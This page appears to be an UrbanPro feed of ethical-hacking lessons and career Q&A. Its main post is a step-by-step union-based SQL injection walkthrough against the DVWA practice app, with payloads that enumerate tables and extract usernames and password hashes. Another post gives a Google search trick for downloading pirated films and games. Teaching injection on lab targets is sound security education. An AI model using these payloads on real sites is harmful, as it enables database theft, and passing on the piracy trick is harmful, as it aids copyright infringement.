Find the best tutors and institutes for Ethical Hacking

Find Ethical Hacking Tutors & Institutes

Please select a Category.

Please select a Locality.

No matching category found.

No matching Locality found.

Outside India?

Feed

Ask a Question

Post a Lesson

All

All

Lessons

Discussion

Lesson Posted on 31 Mar IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Google searching trick to download any movie, game, software

Ashok Kumar

I can teach each and every topics very easily and make it stronger for the students.

Hi guys, if you had trouble finding movies or games. Try searching google for the parent directory e.g., Parent directory gta5 pc E.g., parent directory lord of the rings.mkv E.g., parent directory lord of the rings. mp4
Comments
Dislike Bookmark

Lesson Posted on 11 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Application Security IT Courses +2 Tuition/BTech Tuition/Information &Web Security Tuition/BSc Tuition/Information Security less

Union Based SQL Injection | DVWA (Legal)

Palvinder Singh

Cyber Security Analyst, has done "Bachelor Technology in Information Technology" and "Certified Ethical...

Union Based Injection:Technology: phpDatabase: MysqlThe main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).DVWA: Damnn Vulnerable Web Application:A... read more

Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.

read less
Comments
Dislike Bookmark

Lesson Posted on 07 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Application Security Tuition/BTech Tuition/Information &Web Security

Union Based SQL Injection Live Website (Legal)

Palvinder Singh

Cyber Security Analyst, has done "Bachelor Technology in Information Technology" and "Certified Ethical...

Start Performing SQL Injection and get database from backend. Website is : http://testphp.vulnweb.com/ For any doubt and queries contact me, will share complete walkhrough and Solutions
Comments
Dislike Bookmark

Looking for Ethical Hacking Training

Find best Ethical Hacking Training in your locality on UrbanPro.

FIND NOW

Answered on 30/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Encronos Cyber Security And Investigations

We suggest you to have an understanding of concepts on networking, operating systems and some basic programming to broaden your propects of a career as a ethical hacker.
Answers 6 Comments
Dislike Bookmark

Answered on 12/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Mahesh Raja

Learn Linux And Networking.

I can teach you ethical hacking.. i am a certified security consultant
Answers 5 Comments
Dislike Bookmark

Answered on 29/11/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

What is the methodology of penetration testing services?

Karthik Suganthi Yana

Training Professional

Its a method to find vulnerabilities that an attacker could exploit.
Answers 2 Comments
Dislike Bookmark

Looking for Ethical Hacking Training

Find best Ethical Hacking Training in your locality on UrbanPro.

FIND NOW

Answered on 16/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

What should be my plan to be a cyber security professional/ethical hacker?

Laurels Overseas Educational Consultancy

Prepare yourself with basic networking concepts with system functionality and later join for a ethical hacking & cyber security course.
Answers 2 Comments 1
Dislike Bookmark

Answered on 06 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Where can I find a comprehensive list of known OS vulnerabilities sorted by OS version?

Palvinder Singh

Cyber Security Analyst

List of Vulnerabilities in a sorted order can be only found on basis of there CVE number. Every vulnerability coming world wide has unique CVE number and its CVSS Score. So the Common platform, where you can find all is cvedetials. Here you can search for any Operating System.
Answers 1 Comments
Dislike Bookmark

Answered on 16/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Which certification in IT security has the highest value?

Laurels Overseas Educational Consultancy

ECSA & CISSP - Depends on the level of support in our work we need to upskill and complete these certifications.
Answers 2 Comments 1
Dislike Bookmark

Looking for Ethical Hacking Training

Find best Ethical Hacking Training in your locality on UrbanPro.

FIND NOW

Answered on 02 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Which has a better scope - Linux or ethical hacking?

Bharath Kumar N

Ethical Hacking Trainer

Both are in demand right now on there own path, if your interested in server Administartion and cloud Technologies go with linux preferably RED Hat based Courses, or if your interested in finding bugs, breaking stuffs the go with Ethical Hacking, preferably CEH by Ec Council
Answers 2 Comments
Dislike Bookmark

About UrbanPro

UrbanPro.com helps you to connect with the best Ethical Hacking Training in India. Post Your Requirement today and get connected.

Overview

Questions 477

Lessons 22

Total Shares  

Follow 14,409 Followers

Top Contributors

Connect with Expert Tutors & Institutes for Ethical Hacking & Cyber Security

x

Ask a Question

Please enter your Question

Please select a Tag

UrbanPro.com is India's largest network of most trusted tutors and institutes. Over 25 lakh students rely on UrbanPro.com, to fulfill their learning requirements across 1,000+ categories. Using UrbanPro.com, parents, and students can compare multiple Tutors and Institutes and choose the one that best suits their requirements. More than 6.5 lakh verified Tutors and Institutes are helping millions of students every day and growing their tutoring business on UrbanPro.com. Whether you are looking for a tutor to learn mathematics, a German language trainer to brush up your German language skills or an institute to upgrade your IT skills, we have got the best selection of Tutors and Training Institutes for you. Read more